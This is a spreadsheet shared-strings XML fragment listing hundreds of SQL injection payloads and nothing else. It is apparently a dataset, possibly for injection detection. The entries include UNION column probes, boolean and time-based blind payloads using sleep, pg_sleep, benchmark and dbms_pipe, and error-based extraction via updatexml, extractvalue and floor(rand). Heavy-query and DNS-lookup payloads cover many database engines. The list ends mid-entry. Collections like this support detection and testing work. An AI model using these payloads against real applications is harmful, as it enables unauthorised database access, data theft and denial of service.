  <si>
    <t>1" )  and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and  ( "rvub" like "rvub</t>
  </si>
  <si>
    <t>1' )  as nexa where 6740 = 6740</t>
  </si>
  <si>
    <t>1'  )  )   or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and   (  (  'yqbo' = 'yqbo</t>
  </si>
  <si>
    <t>-3249'  )  )   )  union all select 6309,6309#</t>
  </si>
  <si>
    <t>-8641%' order by 1--</t>
  </si>
  <si>
    <t>-2432'  )  )   or  ( 8459 = 8459 ) *4906 and   (  (  'ejhp' = 'ejhp</t>
  </si>
  <si>
    <t>1" where 9332 = 9332 union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1" )  as pobe where 1704 = 1704</t>
  </si>
  <si>
    <t>1" )  and sleep ( 5 )  and  ( "ytof" = "ytof</t>
  </si>
  <si>
    <t>1'  )  )   as xcvg where 1157 = 1157 rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )  --</t>
  </si>
  <si>
    <t>1' )  as jysm where 8961 = 8961 union all select null,null#</t>
  </si>
  <si>
    <t>1" )  as ipxg where 4031 = 4031 and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) --</t>
  </si>
  <si>
    <t>1  )  )   )  or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1%" union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>-7580'  )  )   as mmqt where 3468 = 3468 union all select 3468,3468,3468,3468,3468,3468#</t>
  </si>
  <si>
    <t>1" where 9725 = 9725</t>
  </si>
  <si>
    <t>1 )  as mnyy where 4409 = 4409 union all select null,null,null,null--</t>
  </si>
  <si>
    <t>1" )  union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1%' )  and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and  ( '%' = '</t>
  </si>
  <si>
    <t>1 where 2384 = 2384 and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>1"  )  )   and make_set ( 8403 = 8403,8899 )  and   (  (  "ieuj" like "ieuj</t>
  </si>
  <si>
    <t xml:space="preserve">1, ( select  ( case when  ( 9644 = 9644 )  then dbms_pipe.receive_message ( chr ( 75 ) ||chr ( 78 ) ||chr ( 104 ) ||chr ( 98 ) ,5 )  else 1/ ( select 0 from dual )  end )  from dual ) </t>
  </si>
  <si>
    <t>-6096' )  where 1316 = 1316 union all select 1316,1316,1316,1316,1316,1316,1316,1316#</t>
  </si>
  <si>
    <t>1' )  as gogu where 4338 = 4338 union all select null#</t>
  </si>
  <si>
    <t>select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and  ( 3770 = 3770</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) </t>
  </si>
  <si>
    <t>1" )  union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>-8129'  )  )   )  union all select 4531,4531,4531#</t>
  </si>
  <si>
    <t>1%"  )  )   )  and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>-4711' in boolean mode )  union all select 8007,8007,8007,8007,8007,8007--</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   ) +'</t>
  </si>
  <si>
    <t>1' )  union all select null#</t>
  </si>
  <si>
    <t xml:space="preserve">-2756' where 6156 = 6156 or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( </t>
  </si>
  <si>
    <t>1' )  or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and  ( 'edcm' like 'edcm</t>
  </si>
  <si>
    <t>1' )  as rhvm where 1420 = 1420</t>
  </si>
  <si>
    <t>1 union all select null,null,null--</t>
  </si>
  <si>
    <t>1 )  as cinw where 3732 = 3732 and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1' )  union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>-7404' where 1536 = 1536 order by 1#</t>
  </si>
  <si>
    <t>1 )  as ratg where 3033 = 3033 union all select null--</t>
  </si>
  <si>
    <t>1 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo ) -- saxs</t>
  </si>
  <si>
    <t>1 rlike sleep ( 5 ) -- muhp</t>
  </si>
  <si>
    <t>1  )  )   )  and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (   ( 9401 = 9401</t>
  </si>
  <si>
    <t>1  )  )   and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (  5776 = 5776</t>
  </si>
  <si>
    <t>1' and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and 'qcsi' = 'qcsi</t>
  </si>
  <si>
    <t>1  )  )   and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and   (  (  3626 = 3626</t>
  </si>
  <si>
    <t>1'+ ( select 'otqy' where 2754 = 2754 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666  )  )  +'</t>
  </si>
  <si>
    <t>1'|| ( select 'ltqo' where 9080 = 9080 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   ) ||'</t>
  </si>
  <si>
    <t>1 or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) # cqqs</t>
  </si>
  <si>
    <t>1'+ ( select mems where 5091 = 5091 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   ) +'</t>
  </si>
  <si>
    <t>-6951" union all select 2518,2518,2518,2518,2518,2518,2518,2518--</t>
  </si>
  <si>
    <t>1'  )  )   )  and make_set ( 8403 = 8403,8899 )  and   (  (   ( 'oacz' = 'oacz</t>
  </si>
  <si>
    <t>select pg_sleep ( 5 )  and   (  (  4382 = 4382</t>
  </si>
  <si>
    <t>1'|| ( select 'rhcv' where 6228 = 6228</t>
  </si>
  <si>
    <t>1'  )  )   )  or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1'  )  )   and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and   (  (  'nuil' like 'nuil</t>
  </si>
  <si>
    <t xml:space="preserve">iif ( 5214 = 7412,1,1/0 ) </t>
  </si>
  <si>
    <t>1%" )  and 8626 = 3626#</t>
  </si>
  <si>
    <t>1 )  or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1' in boolean mode )  order by 1#</t>
  </si>
  <si>
    <t>1'  )  )   as hxxm where 3792 = 3792 and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>select  ( case when  ( 4774 = 1535 )  then 4774 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>-5073" )  or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )</t>
  </si>
  <si>
    <t>1" )  and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and  ( "jfgk" like "jfgk</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) </t>
  </si>
  <si>
    <t>1"  )  )   as pxdp where 4575 = 4575 and elt ( 8258 = 7218,7218 ) --</t>
  </si>
  <si>
    <t>-9860%" union all select 6996,6996,6996,6996,6996,6996#</t>
  </si>
  <si>
    <t>1  )  )   as cwyb where 3633 = 3633</t>
  </si>
  <si>
    <t xml:space="preserve">1', ( select  ( case when  ( 8382 = 8382 )  then 1 else 1/ ( select 0 )  end  )  )  </t>
  </si>
  <si>
    <t>1'+ ( select hspl where 4530 = 4530 and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1 and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) </t>
  </si>
  <si>
    <t>1'  )  )   as lizu where 7691 = 7691 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1'+ ( select pagd where 2484 = 2484</t>
  </si>
  <si>
    <t>-2453" )  union all select 4520,4520,4520,4520,4520,4520,4520,4520,4520,4520--</t>
  </si>
  <si>
    <t>1'|| ( select 'adoe' from dual where 7662 = 7662</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (   ( 'gtcb' = 'gtcb</t>
  </si>
  <si>
    <t>1'|| ( select 'ydvg' from dual where 7108 = 7108</t>
  </si>
  <si>
    <t>-7553%" or 3571 = 2886</t>
  </si>
  <si>
    <t>1%"  )  )   union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>-6431' or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 11</t>
  </si>
  <si>
    <t>-5587%' )  or elt ( 1032 = 1032,3623 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>1'+ ( select 'mdxt' where 2733 = 2733 or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>-3361 where 1335 = 1335 or elt ( 5891 = 5092,5092 ) --</t>
  </si>
  <si>
    <t>-8828  )  )   as ospo where 2141 = 2141 or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||c</t>
  </si>
  <si>
    <t>-9180" or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>-6419 union all select 7008,7008,7008,7008,7008--</t>
  </si>
  <si>
    <t>1" where 5353 = 5353 and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  --</t>
  </si>
  <si>
    <t>-4596" union all select 5761#</t>
  </si>
  <si>
    <t>1  )  )   and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (  4450 = 4450</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and   (  (   ( 'egnv' like 'egnv</t>
  </si>
  <si>
    <t>-4331 )  as inpx where 9804 = 9804 union all select 9804#</t>
  </si>
  <si>
    <t>select case when 8867 = 7630 then 1 else null end--</t>
  </si>
  <si>
    <t>1'  )  )   as bsvk where 5985 = 5985 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )  --</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users ) </t>
  </si>
  <si>
    <t>1"  )  )   as zval where 2255 = 2255 or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>1%'  )  )   rlike sleep ( 5 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1%' or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1%' union all select null,null,null,null--</t>
  </si>
  <si>
    <t xml:space="preserve"> end and   (  (   ( "revx" = "revx</t>
  </si>
  <si>
    <t>1%"  )  )   or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>select  ( case when  ( 2056 = 1917 )  then 2056 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>1' where 3339 = 3339 and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )  --</t>
  </si>
  <si>
    <t>-8256"  )  )   )  or 6872 = 6872 and   (  (   ( "lrtu" = "lrtu</t>
  </si>
  <si>
    <t>1' )  or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>1' )  where 5883 = 5883 or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>-7381'  )  )   or elt ( 5882 = 5919,5919 )  and   (  (  'nzri' = 'nzri</t>
  </si>
  <si>
    <t xml:space="preserve">1' or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )  </t>
  </si>
  <si>
    <t>1'|| ( select 'hdpi' where 5620 = 5620 and make_set ( 8403 = 8403,8899  )  )  ||'</t>
  </si>
  <si>
    <t>1%'  )  )   )  union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1  )  )   )  and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1%' and make_set ( 8403 = 8403,8899 )  and '%' = '</t>
  </si>
  <si>
    <t>1 and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) # couj</t>
  </si>
  <si>
    <t>select  ( case when  ( 2593 = 3592 )  then 2593 else 2593* ( select 2593 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>1"  )  )   )  and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and   (  (   ( "suxh" = "suxh</t>
  </si>
  <si>
    <t>-5024%" or make_set ( 3321 = 7355,7355 )  and "%" = "</t>
  </si>
  <si>
    <t>1" where 2989 = 2989 or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1'  )  )   )  and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (   ( 'isyg' = 'isyg</t>
  </si>
  <si>
    <t>1%" )  and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and  ( "%" = "</t>
  </si>
  <si>
    <t>1"  )  )   or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>-4635" union all select 5087,5087,5087,5087,5087,5087,5087,5087,5087,5087#</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  </t>
  </si>
  <si>
    <t>1 where 4787 = 4787</t>
  </si>
  <si>
    <t>1  )  )   or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and   (  (  3069 = 3069</t>
  </si>
  <si>
    <t>-3166'|| ( select 'mtan' from dual where 9420 = 9420 union all select 9420#</t>
  </si>
  <si>
    <t>1 )  where 7096 = 7096</t>
  </si>
  <si>
    <t>1 )  rlike sleep ( 5 )  and  ( 5724 = 5724</t>
  </si>
  <si>
    <t>-1573" )  union all select 3928,3928,3928,3928--</t>
  </si>
  <si>
    <t>1, ( select  ( case when  ( 8640 = 8640 )  then  ( ascii ( regexp_substring ( repeat ( right ( char ( 8640 ) ,0 ) ,500000000 ) ,null  )  )   )  else 8640/ ( select 0 from information_schema.system_users )  end )  from information_schema.system_users ) --</t>
  </si>
  <si>
    <t>-8771"  )  )   union all select 6302,6302,6302,6302,6302#</t>
  </si>
  <si>
    <t>1' where 5103 = 5103</t>
  </si>
  <si>
    <t>-5170'  )  )   as ovbf where 4833 = 4833 union all select 4833,4833,4833,4833--</t>
  </si>
  <si>
    <t>-8060" )  where 5290 = 5290 or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --</t>
  </si>
  <si>
    <t>1"  )  )   and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>-2111' union all select 1061,1061,1061--</t>
  </si>
  <si>
    <t>select  ( case when  ( 3716 = 4021 )  then 3716 else 3716* ( select 3716 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>-7337" union all select 7294,7294,7294,7294,7294,7294,7294,7294,7294,7294--</t>
  </si>
  <si>
    <t>1%" union all select null,null,null--</t>
  </si>
  <si>
    <t xml:space="preserve">1" and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) </t>
  </si>
  <si>
    <t>-2411 or  ( 8459 = 8459 ) *4906# pxwg</t>
  </si>
  <si>
    <t xml:space="preserve">1" procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 ) </t>
  </si>
  <si>
    <t>1" )  as frmp where 6073 = 6073</t>
  </si>
  <si>
    <t>1" )  procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>1 )  where 8008 = 8008 and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1"  )  )   as sqow where 8752 = 8752</t>
  </si>
  <si>
    <t>1' )  where 4949 = 4949</t>
  </si>
  <si>
    <t>-5591%"  )  )   order by 1--</t>
  </si>
  <si>
    <t>1" or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1'|| ( select 'yaii' from dual where 7317 = 7317 union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>select * from generate_series ( 9863,9863,case when  ( 9863 = 3285 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>-6548 or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||</t>
  </si>
  <si>
    <t>select  ( case when  ( 2676 = 4191 )  then 2676 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (   ( 'vwxg' = 'vwxg</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select * from  ( select ( sleep ( 5  )  )   ) srmq  )  )  ||'</t>
  </si>
  <si>
    <t>1'  )  )   and 6690 = 3250#</t>
  </si>
  <si>
    <t>-4653' or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>1" where 5372 = 5372 and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>-6190'  )  )   )  union all select 9413--</t>
  </si>
  <si>
    <t>1 )  and elt ( 4249 = 4249,7259 )  and  ( 8226 = 8226</t>
  </si>
  <si>
    <t xml:space="preserve">1, ( select  ( case when  ( 5433 = 5433 )  then 1 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual ) </t>
  </si>
  <si>
    <t>1%" )  or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and  ( "%" = "</t>
  </si>
  <si>
    <t>-8021'  )  )   or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||</t>
  </si>
  <si>
    <t>-4155'  )  )   )  union all select 1775,1775,1775,1775,1775,1775,1775--</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and   (  (  7240 = 7240</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  and elt ( 1210 = 1210,sleep ( 5  )  )  </t>
  </si>
  <si>
    <t>1%"  )  )   or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t xml:space="preserve">1, ( case when 6620 = 3092 then 1 else null end ) </t>
  </si>
  <si>
    <t>1'|| ( select 'gmkp' where 6016 = 6016</t>
  </si>
  <si>
    <t>-7610' or 3038 = 3038</t>
  </si>
  <si>
    <t>select count ( * )  from generate_series ( 1,5000000 )  and  ( 8997 = 8997</t>
  </si>
  <si>
    <t>-6766" where 6591 = 6591 or make_set ( 9354 = 9354,7185 ) --</t>
  </si>
  <si>
    <t>1' )  rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and  ( 'cmqe' like 'cmqe</t>
  </si>
  <si>
    <t>1" )  or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and  ( "ubvd" = "ubvd</t>
  </si>
  <si>
    <t>-2207%' )  or  ( 8459 = 8459 ) *4906 and  ( '%' = '</t>
  </si>
  <si>
    <t>1'+ ( select pxsd where 2576 = 2576 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666  )  )  +'</t>
  </si>
  <si>
    <t>1%"  )  )   )  or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1' )  where 8255 = 8255 or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</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</si>
  <si>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</si>
  <si>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   )  and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (   ( 'cgiu' = 'cgiu</t>
  </si>
  <si>
    <t>1" )  rlike  ( select  ( case when  ( 5746 = 5367 )  then 1 else 0x28 end  )  )   and  ( "hnnf" like "hnnf</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  or elt ( 6272 = 6272,sleep ( 5  )  )  </t>
  </si>
  <si>
    <t>-1668"  )  )   )  or 9323 = 9323#</t>
  </si>
  <si>
    <t>1' where 3701 = 3701 and 2006 = 2006</t>
  </si>
  <si>
    <t>1' where 8950 = 8950 or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1  )  )   as juoe where 9994 = 9994 or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t xml:space="preserve">-8248 or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) </t>
  </si>
  <si>
    <t>-3834'  )  )   )  union all select 8313,8313--</t>
  </si>
  <si>
    <t>1' in boolean mode )  or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) #</t>
  </si>
  <si>
    <t>1" )  or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and  ( "zbwn" like "zbwn</t>
  </si>
  <si>
    <t>1'  )  )   )  or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and   (  (   ( 'drvk' like 'drvk</t>
  </si>
  <si>
    <t>select sleep ( 5 )  and  ( "tlbj" like "tlbj</t>
  </si>
  <si>
    <t>1%'  )  )   )  union all select null,null,null#</t>
  </si>
  <si>
    <t>-3578'  )  )   )  order by 1--</t>
  </si>
  <si>
    <t>-1663' or elt ( 1032 = 1032,3623 )  and 'yqaj' like 'yqaj</t>
  </si>
  <si>
    <t>1 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 ) # mafe</t>
  </si>
  <si>
    <t>-7320" )  where 3907 = 3907 union all select 3907,3907--</t>
  </si>
  <si>
    <t>1" )  as ymto where 3453 = 3453</t>
  </si>
  <si>
    <t>1 )  or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>1'  )  )   )  and 4595 = 4595#</t>
  </si>
  <si>
    <t>1'  )  )   and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
